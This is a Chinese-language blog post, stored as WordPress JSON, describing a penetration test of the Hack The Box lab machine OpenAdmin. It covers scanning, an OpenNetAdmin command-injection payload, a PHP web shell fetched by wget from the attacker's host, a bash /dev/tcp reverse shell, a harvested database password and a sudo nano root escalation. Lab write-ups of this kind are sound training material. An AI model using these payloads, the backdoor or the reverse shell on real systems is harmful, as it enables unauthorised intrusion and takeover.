{"id":155,"date":"2024-11-13T10:37:47","date_gmt":"2024-11-13T02:37:47","guid":{"rendered":"https:\/\/www.misaka19008-lab.icu\/?p=155"},"modified":"2024-11-13T10:37:48","modified_gmt":"2024-11-13T02:37:48","slug":"155","status":"publish","type":"post","link":"https:\/\/www.misaka19008-lab.icu\/index.php\/2024\/11\/13\/155\/","title":{"rendered":"HTB\u9776\u673a OpenAdmin \u6e17\u900f\u6d4b\u8bd5\u8bb0\u5f55"},"content":{"rendered":"
\n

\u76ee\u6807\u4fe1\u606f<\/h1>\n

IP\u5730\u5740\uff1a<\/strong>10.10.10.171<\/code><\/p><\/blockquote>\n

\n

\u4fe1\u606f\u6536\u96c6<\/h1>\n

ICMP\u68c0\u6d4b<\/h2>\n
\u250c\u2500\u2500(root\u327fmisaka19008)-[\/home\/\u2026\/Documents\/pentest_notes\/openadmin\/nmap_reports]\n\u2514\u2500# ping -c 4 10.10.10.171\nPING 10.10.10.171 (10.10.10.171) 56(84) bytes of data.\n64 bytes from 10.10.10.171: icmp_seq=1 ttl=63 time=82.4 ms\n64 bytes from 10.10.10.171: icmp_seq=2 ttl=63 time=157 ms\n64 bytes from 10.10.10.171: icmp_seq=3 ttl=63 time=81.6 ms\n64 bytes from 10.10.10.171: icmp_seq=4 ttl=63 time=100 ms\n\n--- 10.10.10.171 ping statistics ---\n4 packets transmitted, 4 received, 0% packet loss, time 3032ms\nrtt min\/avg\/max\/mdev = 81.567\/105.221\/156.793\/30.681 ms<\/code><\/pre>\n
\u653b\u51fb\u673a\u548c\u9776\u673a\u4e4b\u95f4\u7f51\u7edc\u8fde\u901a\u6027\u826f\u597d\u3002<\/p>\n
\u9632\u706b\u5899\u68c0\u6d4b<\/h2>\n
# Nmap 7.94SVN scan initiated Tue Aug  6 16:42:07 2024 as: nmap -sF -p- --min-rate 2000 -oN .\/fin_result.txt 10.10.10.171\nWarning: 10.10.10.171 giving up on port because retransmission cap hit (10).\nNmap scan report for 10.10.10.171 (10.10.10.171)\nHost is up (0.30s latency).\nAll 65535 scanned ports on 10.10.10.171 (10.10.10.171) are in ignored states.\nNot shown: 64064 closed tcp ports (reset), 1471 open|filtered tcp ports (no-response)\n\n# Nmap done at Tue Aug  6 16:45:43 2024 -- 1 IP address (1 host up) scanned in 215.43 seconds<\/code><\/pre>\n
\u65e0\u6cd5\u63a2\u6d4b\u9632\u706b\u5899\u72b6\u6001\uff0c\u76f4\u63a5\u8fdb\u884cTCP<\/code>\u5168\u7aef\u53e3\u534a\u5f00\u626b\u63cf\u3002<\/p>\n
\u7f51\u7edc\u7aef\u53e3\u626b\u63cf<\/h2>\n
TCP<\/code>\u7aef\u53e3\u626b\u63cf\u7ed3\u679c<\/strong><\/p>\n
# Nmap 7.94SVN scan initiated Tue Aug  6 16:51:31 2024 as: nmap -sS -sV -A -p- --min-rate 2000 -oN .\/tcp_result.txt 10.10.10.171\nWarning: 10.10.10.171 giving up on port because retransmission cap hit (10).\nNmap scan report for 10.10.10.171 (10.10.10.171)\nHost is up (0.15s latency).\nNot shown: 65533 closed tcp ports (reset)\nPORT   STATE SERVICE VERSION\n22\/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)\n| ssh-hostkey: \n|   2048 4b:98:df:85:d1:7e:f0:3d:da:48:cd:bc:92:00:b7:54 (RSA)\n|   256 dc:eb:3d:c9:44:d1:18:b1:22:b4:cf:de:bd:6c:7a:54 (ECDSA)\n|_  256 dc:ad:ca:3c:11:31:5b:6f:e6:a4:89:34:7c:9b:e5:50 (ED25519)\n80\/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))\n|_http-title: Apache2 Ubuntu Default Page: It works\n|_http-server-header: Apache\/2.4.29 (Ubuntu)\nNo exact OS matches for host (If you know what OS is running on it, see https:\/\/nmap.org\/submit\/ ).\nTCP\/IP fingerprint:\nOS:SCAN(V=7.94SVN%E=4%D=8\/6%OT=22%CT=1%CU=39771%PV=Y%DS=2%DC=T%G=Y%TM=66B1E\nOS:474%P=x86_64-pc-linux-gnu)SEQ(SP=100%GCD=1%ISR=106%TI=Z%CI=Z%II=I%TS=9)S\nOS:EQ(SP=100%GCD=1%ISR=106%TI=Z%CI=Z%II=I%TS=A)SEQ(SP=100%GCD=2%ISR=106%TI=\nOS:Z%CI=Z%II=I%TS=A)SEQ(SP=101%GCD=1%ISR=106%TI=Z%CI=Z%TS=9)OPS(O1=M53CST11\nOS:NW7%O2=M53CST11NW7%O3=M53CNNT11NW7%O4=M53CST11NW7%O5=M53CST11NW7%O6=M53C\nOS:ST11)WIN(W1=7120%W2=7120%W3=7120%W4=7120%W5=7120%W6=7120)ECN(R=Y%DF=Y%T=\nOS:40%W=7210%O=M53CNNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=AS%RD=0%Q=)T2\nOS:(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R=Y%DF=Y%T=40\nOS:%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q\nOS:=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%T=40%IPL=164\nOS:%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%CD=S)\n\nNetwork Distance: 2 hops\nService Info: OS: Linux; CPE: cpe:\/o:linux:linux_kernel\n\nTRACEROUTE (using port 111\/tcp)\nHOP RTT       ADDRESS\n1   206.54 ms 10.10.14.1 (10.10.14.1)\n2   208.45 ms 10.10.10.171 (10.10.10.171)\n\nOS and Service detection performed. Please report any incorrect results at https:\/\/nmap.org\/submit\/ .\n# Nmap done at Tue Aug  6 16:53:08 2024 -- 1 IP address (1 host up) scanned in 96.54 seconds<\/code><\/pre>\n
UDP<\/code>\u7aef\u53e3\u5f00\u653e\u5217\u8868\u626b\u63cf\u7ed3\u679c<\/strong><\/p>\n
# Nmap 7.94SVN scan initiated Tue Aug  6 16:55:43 2024 as: nmap -sU -p- --min-rate 2000 -oN .\/udp_ports.txt 10.10.10.171\nWarning: 10.10.10.171 giving up on port because retransmission cap hit (10).\nRTTVAR has grown to over 2.3 seconds, decreasing to 2.0\nRTTVAR has grown to over 2.3 seconds, decreasing to 2.0\nRTTVAR has grown to over 2.3 seconds, decreasing to 2.0\nRTTVAR has grown to over 2.3 seconds, decreasing to 2.0\nRTTVAR has grown to over 2.3 seconds, decreasing to 2.0\nRTTVAR has grown to over 2.3 seconds, decreasing to 2.0\nRTTVAR has grown to over 2.3 seconds, decreasing to 2.0\nRTTVAR has grown to over 2.3 seconds, decreasing to 2.0\nNmap scan report for 10.10.10.171 (10.10.10.171)\nHost is up (0.32s latency).\nAll 65535 scanned ports on 10.10.10.171 (10.10.10.171) are in ignored states.\nNot shown: 65180 open|filtered udp ports (no-response), 355 closed udp ports (port-unreach)\n\n# Nmap done at Tue Aug  6 17:01:46 2024 -- 1 IP address (1 host up) scanned in 363.04 seconds<\/code><\/pre>\n
UDP<\/code>\u7aef\u53e3\u8be6\u7ec6\u4fe1\u606f\u626b\u63cf\u7ed3\u679c<\/strong><\/p>\n
\uff08\u65e0\uff09<\/code><\/pre>\n
\u540c\u65f6\u53d1\u73b0\u9776\u673a\u64cd\u4f5c\u7cfb\u7edf\u4e3aUbuntu Linux<\/code>\u3002<\/p>\n
\n
\u670d\u52a1\u63a2\u6d4b<\/h1>\n
SSH\u670d\u52a1\uff0822\u7aef\u53e3\uff09<\/h2>\n
\u7aef\u53e3Banner<\/code>\uff1a<\/p>\n
\u250c\u2500\u2500(root\u327fmisaka19008)-[\/home\/megumin]\n\u2514\u2500# nc -nv 10.10.10.171 22                                       \n(UNKNOWN) [10.10.10.171] 22 (ssh) open\nSSH-2.0-OpenSSH_7.6p1 Ubuntu-4ubuntu0.3<\/code><\/pre>\n
Web\u5e94\u7528\u7a0b\u5e8f\uff0880\u7aef\u53e3\uff09<\/h2>\n
\u6253\u5f00\u4e3b\u9875\uff1ahttp:\/\/openadmin.htb\/<\/code><\/p>\n
\"\"<\/p>\n
\u76f4\u63a5\u626b\u63cf\u76ee\u5f55\uff1a<\/p>\n
# Dirsearch started Wed Aug  7 08:11:41 2024 as: \/usr\/lib\/python3\/dist-packages\/dirsearch\/dirsearch.py -u http:\/\/openadmin.htb\/ -x 400,403,404 -t 60 -e php,js,html,asp,aspx,txt,zip,tar.gz,pcap\n\n301   314B   http:\/\/openadmin.htb\/music    -> REDIRECTS TO: http:\/\/openadmin.htb\/music\/\n301   312B   http:\/\/openadmin.htb\/ona    -> REDIRECTS TO: http:\/\/openadmin.htb\/ona\/<\/code><\/pre>\n
\u8bbf\u95ee\/music<\/code>\u76ee\u5f55\uff0c\u53d1\u73b0\u8c8c\u4f3c\u4e3a\u4e00\u4e2a\u9759\u6001\u7ad9\u70b9\uff1a<\/p>\n
\"\"<\/p>\n
\u8bbf\u95ee\/ona<\/code>\u76ee\u5f55\uff0c\u53d1\u73b0\u8be5\u76ee\u5f55\u4e0b\u90e8\u7f72\u4e86OpenNetAdmin v18.1.1<\/code>\u7f51\u7edc\u7ba1\u7406\u7cfb\u7edf\uff1a<\/p>\n
\"\"<\/p>\n
\u7ecf\u8fc7\u8054\u7f51\u67e5\u8be2\uff0c\u53d1\u73b0\u8be5\u7cfb\u7edf\u5b58\u5728\u4e25\u91cd\u7684\u547d\u4ee4\u6267\u884c\u6f0f\u6d1e\uff1a<\/p>\n
\"\"<\/p>\n
\n
\u6e17\u900f\u6d4b\u8bd5<\/h1>\n
OpenNetAdmin RCE\u6f0f\u6d1e\u5229\u7528<\/h2>\n
\u901a\u8fc7\u9605\u8bfbEXP<\/code>\u4ee3\u7801\uff0c\u5f97\u77e5\u6f0f\u6d1e\u9875\u9762\u4e3alogin.php<\/code>\uff0c\u800c\u6f0f\u6d1e\u53c2\u6570\u5982\u4e0b\u6240\u793a\uff1a<\/p>\n
xajax=window_submit&xajaxargs[]=tooltips&xajaxargs[]=ip%3D%3E;{COMMAND};&xajaxargs[]=ping<\/code><\/pre>\n
\u8bbf\u95eelogin.php<\/code>\uff0c\u540c\u65f6\u6253\u5f00BurpSuite<\/code>\u62e6\u622a\u8bf7\u6c42\u5305\uff1a<\/p>\n
\"\"<\/p>\n
\u5c06\u8bf7\u6c42\u5305\u53d1\u9001\u5230Repeater<\/code>\u6a21\u5757\uff0c\u5c06POST<\/code>\u8bf7\u6c42\u6570\u636e\u66ff\u6362\u4e3a\u6076\u610f\u6570\u636e\uff0c\u76f4\u63a5\u8f93\u5165\u8981\u6267\u884c\u7684\u547d\u4ee4\u540e\u53d1\u9001\uff1a<\/p>\n
xajax=window_submit&xajaxargs[]=tooltips&xajaxargs[]=ip%3D%3E;%65%63%68%6f%20%22%3c%63%6d%64%72%65%73%3e%22;id;hostnamectl;%65%63%68%6f%20%22%2f%3c%63%6d%64%72%65%73%3e%22;&xajaxargs[]=ping<\/code><\/pre>\n
\"\"<\/p>\n
\u6f0f\u6d1e\u6d4b\u8bd5\u6210\u529f\uff01\uff01\u63a5\u4e0b\u6765\u76f4\u63a5\u5728\u672c\u5730\u521b\u5efa\u540e\u95e8\u6587\u4ef6\uff1a<\/strong><\/p>\n
<?php\n  $command = $_GET['cmd'];\n  if (isset($command) && !empty($command)) {\n    system($command);\n  } else die(\"Hello, hello, I'm sparkle!\");\n?><\/code><\/pre>\n
\u968f\u540e\u4f7f\u7528\u8be5\u6f0f\u6d1e\u4e0b\u8f7d\u540e\u95e8\uff1a<\/p>\n
xajax=window_submit&xajaxargs[]=tooltips&xajaxargs[]=ip%3D%3E;%65%63%68%6f%20%22%3c%63%6d%64%72%65%73%3e%22;wget%20http:\/\/10.10.14.14\/sparkle.php;%65%63%68%6f%20%22%2f%3c%63%6d%64%72%65%73%3e%22;&xajaxargs[]=ping<\/code><\/pre>\n
\"\"<\/p>\n
\u6210\u529f\uff01\uff01\uff01\u76f4\u63a5\u8bbf\u95ee\u540e\u95e8\uff0c\u53cd\u5f39Shell\uff1a<\/strong><\/p>\n
\/bin\/bash -c 'bash -i >& \/dev\/tcp\/10.10.14.14\/443 0>&1'<\/code><\/pre>\n
\"\"<\/p>\n
\n
\u6743\u9650\u63d0\u5347<\/h1>\n
\u79fb\u52a8\u81f3jimmy\u7528\u6237<\/h2>\n
\u8fdb\u5165\u7cfb\u7edf\u4e4b\u540e\u8fdb\u884c\u4fe1\u606f\u9884\u6536\u96c6\uff0c\u53d1\u73b0\u9776\u673a\u5185\u6709\u4e24\u4e2a\u7528\u6237\uff1ajimmy<\/code>\u548cjoanna<\/code>\uff1a<\/p>\n
\"\"<\/p>\n
\u540c\u65f6\u53d1\u73b0OpenNetAdmin<\/code>\u7684\u6570\u636e\u5e93\u914d\u7f6e\u6587\u4ef6\u4e3a\uff1a\/opt\/ona\/www\/local\/config\/database_settings.inc.php<\/code>\u3002\u5c1d\u8bd5\u67e5\u770b\uff1a<\/p>\n
<?php\n\n$ona_contexts=array (\n  'DEFAULT' => \n  array (\n    'databases' => \n    array (\n      0 => \n      array (\n        'db_type' => 'mysqli',\n        'db_host' => 'localhost',\n        'db_login' => 'ona_sys',\n        'db_passwd' => 'n1nj4W4rri0R!',\n        'db_database' => 'ona_default',\n        'db_debug' => false,\n      ),\n    ),\n    'description' => 'Default data context',\n    'context_color' => '#D3DBFF',\n  ),\n);\n\n?><\/code><\/pre>\n
\u6210\u529f\u53d1\u73b0\u6570\u636e\u5e93\u767b\u5f55\u51ed\u636e\uff1a<\/p>\n
    \n
  • \u7528\u6237\u540d\uff1aona_sys<\/code><\/li>\n
  • \u5bc6\u7801\uff1an1nj4W4rri0R!<\/code><\/li>\n
  • \u4e3b\u673a\uff1alocalhost<\/code><\/li>\n<\/ul>\n
    \u767b\u5f55\u6570\u636e\u5e93\u63a2\u67e5\uff0c\u6ca1\u6709\u53d1\u73b0\u4fe1\u606f\uff0c\u5c1d\u8bd5\u5c06\u6570\u636e\u5e93\u5bc6\u7801\u4f5c\u4e3a\u7528\u6237jimmy<\/code>\u7684\u5bc6\u7801\u5207\u6362\u7528\u6237\uff1a<\/p>\n
    \"\"<\/p>\n
    \u6210\u529f\uff01\uff01<\/strong><\/p>\n
    \u9664\u6b64\u4e4b\u5916\uff0c\u8fd8\u5728\/var\/www<\/code>\u76ee\u5f55\u4e0b\u53d1\u73b0\u4e86internal<\/code>\u6587\u4ef6\u5939\uff0cjimmy<\/code>\u7528\u6237\u6709\u6743\u67e5\u770b\u3002<\/p>\n
    \u672c\u5730\u4fe1\u606f\u6536\u96c6<\/h2>\n
    \u57fa\u672c\u7cfb\u7edf\u4fe1\u606f<\/strong><\/p>\n
    \"\"<\/p>\n
    \u8fdb\u7a0b\u5217\u8868<\/strong><\/p>\n
    \"\"<\/p>\n
    \u8ba1\u5212\u4efb\u52a1\u5217\u8868<\/strong><\/p>\n
    \"\"\"\"<\/p>\n
    \u73af\u5883\u53d8\u91cf<\/strong><\/p>\n
    \"\"<\/p>\n
    \u7528\u6237\u4fe1\u606f<\/strong><\/p>\n
    \"\"<\/p>\n
    \u7528\u6237\u5bb6\u76ee\u5f55<\/strong><\/p>\n
    \"\"<\/p>\n
    \u7279\u6b8a\u6743\u9650\u6587\u4ef6<\/strong><\/p>\n
    \"\"<\/p>\n
    \u5f00\u653e\u7aef\u53e3\u4fe1\u606f<\/strong><\/p>\n
    \"\"<\/p>\n
    \u654f\u611f\u6587\u4ef6\u6743\u9650<\/strong><\/p>\n
    \"\"<\/p>\n
    \u7ecf\u5206\u6790\u7814\u5224\uff0c\u53d1\u73b0\u9776\u673a\u768452846<\/code>\u7aef\u53e3\u53ea\u5bf9\u672c\u5730IP<\/code>\u5f00\u653e\uff0c\u51b3\u5b9a\u4ee5\u5176\u4e3a\u5165\u53e3\u8fdb\u884c\u63d0\u6743\u3002<\/p>\n
    52846\u7aef\u53e3\u6e17\u900f<\/h2>\n
    \u9996\u5148\u5728\u672c\u5730\u6267\u884c\u5982\u4e0b\u547d\u4ee4\u5c06\u8be5\u7aef\u53e3\u8f6c\u53d1\u81f3\u653b\u51fb\u673a\u4e0a\uff1a<\/p>\n
    ssh -NfqL 52846:localhost:52846 jimmy@10.10.10.171<\/code><\/pre>\n
    \u968f\u540e\u4f7f\u7528Nmap<\/code>\u626b\u63cf\u672c\u673a52846<\/code>\u7aef\u53e3\uff1a<\/p>\n
    # Nmap 7.94SVN scan initiated Wed Aug  7 11:02:13 2024 as: nmap -sS -sV -A -p 52846 -oN .\/52846_result.txt 127.0.0.1\nNmap scan report for localhost (127.0.0.1)\nHost is up (0.000066s latency).\n\nPORT      STATE SERVICE VERSION\n52846\/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))\n|_http-server-header: Apache\/2.4.29 (Ubuntu)\n|_http-title: Tutorialspoint.com\n| http-cookie-flags: \n|   \/: \n|     PHPSESSID: \n|_      httponly flag not set\nWarning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port\nAggressive OS guesses: Linux 5.0 - 5.7 (96%), Linux 3.8 - 4.14 (95%), Linux 3.1 (95%), Linux 3.2 (95%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (95%), Linux 3.7 - 3.11 (94%), Linux 2.6.32 (93%), Linux 3.7 - 3.10 (93%), ASUS RT-N56U WAP (Linux 3.4) (93%), Linux 3.16 (93%)\nNo exact OS matches for host (test conditions non-ideal).\nNetwork Distance: 0 hops\n\nOS and Service detection performed. Please report any incorrect results at https:\/\/nmap.org\/submit\/ .\n# Nmap done at Wed Aug  7 11:02:36 2024 -- 1 IP address (1 host up) scanned in 23.41 seconds<\/code><\/pre>\n
    \u53d1\u73b0\u8be5\u7aef\u53e3\u4e3aHTTP<\/code>\u670d\u52a1\uff0c\u76f4\u63a5\u6253\u5f00\uff1ahttp:\/\/127.0.0.1:52846\/<\/code><\/p>\n
    \"\"<\/p>\n
    \u540c\u65f6\u67e5\u770b\/var\/www\/internal<\/code>\u76ee\u5f55\u4e0b\u7684index.php<\/code>\uff0c\u53d1\u73b0\u7f51\u9875\u4e0a\u7684\u5185\u5bb9\u548cPHP<\/code>\u6587\u4ef6\u4e2d\u7684HTML<\/code>\u5185\u5bb9\u4e00\u6a21\u4e00\u6837\uff1a<\/p>\n
    \"\"<\/p>\n
    \u5224\u65ad\u8be5\u7aef\u53e3HTTP<\/code>\u670d\u52a1\u7684\u6839\u76ee\u5f55\u4e3a\/var\/www\/internal<\/code>\uff0c\u4e0a\u4f20\u6728\u9a6csparkle.php<\/code>\uff0c\u5c1d\u8bd5\u67e5\u770b\u5176\u7528\u6237\uff1a<\/p>\n
    \"\"<\/p>\n
    \u6210\u529f\u53d1\u73b0\u8be5\u670d\u52a1\u7528\u6237\u4e3a<\/strong>joanna<\/code>\uff01\u73b0\u5728\u5c1d\u8bd5\u53cd\u5f39Shell\uff1a<\/strong><\/p>\n
    \"\"<\/p>\n
    \u6210\u529f\uff01\uff01\uff01<\/strong><\/p>\n
    \u5207\u6362SSH\u767b\u5f55<\/h2>\n
    \u8fdb\u5165joanna<\/code>\u7528\u6237\u540e\uff0c\u53d1\u73b0\u5728\u53cd\u5f39Shell\u7684\u573a\u666f\u4e0b\uff0csudo<\/code>\u547d\u4ee4\u65e0\u6cd5\u4f7f\u7528\uff0c\u51b3\u5b9a\u4e0a\u4f20\u672c\u673a\u7684SSH<\/code>\u516c\u94a5\uff0c\u4f7f\u7528SSH<\/code>\u767b\u5f55\uff1a<\/p>\n
    \"\"<\/p>\n
    Sudo nano\u63d0\u6743<\/h2>\n
    \u767b\u5f55joanna<\/code>\u7528\u6237\u540e\uff0c\u53d1\u73b0\u8be5\u7528\u6237\u53ef\u4ee5\u514d\u5bc6\u4ee5root<\/code>\u6743\u9650\u8fd0\u884cnano<\/code>\u7f16\u8f91\u5668\uff1a<\/p>\n
    \"\"<\/p>\n
    \u76f4\u63a5\u6267\u884c\u4ee5\u4e0b\u547d\u4ee4\u63d0\u6743\uff1a<\/p>\n
    sudo \/bin\/nano \/opt\/priv\n[Ctrl + R][Ctrl + X]\nreset; sh 1>&0 2>&0<\/code><\/pre>\n
    \"\"<\/p>\n
    \"\"<\/p>\n
    \u63d0\u6743\u6210\u529f\uff01\uff01\uff01\uff01<\/strong><\/p>\n
    \n
    Flag\u6587\u4ef6\u5c55\u793a<\/h1>\n
    18e7e4fec22edf7d01e121da577b6ef8<\/code><\/pre>\n
    \n
    \u672c\u6b21\u9776\u673a\u6e17\u900f\u5230\u6b64\u7ed3\u675f<\/h1>\n
    \n","protected":false},"excerpt":{"rendered":"
    \u76ee\u6807\u4fe1\u606f IP\u5730\u5740\uff1a10.10.10.171 \u4fe1\u606f\u6536\u96c6 ICMP\u68c0\u6d4b \u250c\u2500\u2500(root\u327fmisaka19008)-[\/home\/\u2026 …<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"_seopress_robots_primary_cat":"","_seopress_titles_title":"","_seopress_titles_desc":"","_seopress_robots_index":"","emotion":"","emotion_color":"","title_style":"","license":"","footnotes":""},"categories":[3,14],"tags":[],"class_list":["post-155","post","type-post","status-publish","format-standard","hentry","category-htb_retired","category-linux_machines"],"_links":{"self":[{"href":"https:\/\/www.misaka19008-lab.icu\/index.php\/wp-json\/wp\/v2\/posts\/155","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.misaka19008-lab.icu\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.misaka19008-lab.icu\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.misaka19008-lab.icu\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.misaka19008-lab.icu\/index.php\/wp-json\/wp\/v2\/comments?post=155"}],"version-history":[{"count":1,"href":"https:\/\/www.misaka19008-lab.icu\/index.php\/wp-json\/wp\/v2\/posts\/155\/revisions"}],"predecessor-version":[{"id":156,"href":"https:\/\/www.misaka19008-lab.icu\/index.php\/wp-json\/wp\/v2\/posts\/155\/revisions\/156"}],"wp:attachment":[{"href":"https:\/\/www.misaka19008-lab.icu\/index.php\/wp-json\/wp\/v2\/media?parent=155"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.misaka19008-lab.icu\/index.php\/wp-json\/wp\/v2\/categories?post=155"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.misaka19008-lab.icu\/index.php\/wp-json\/wp\/v2\/tags?post=155"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}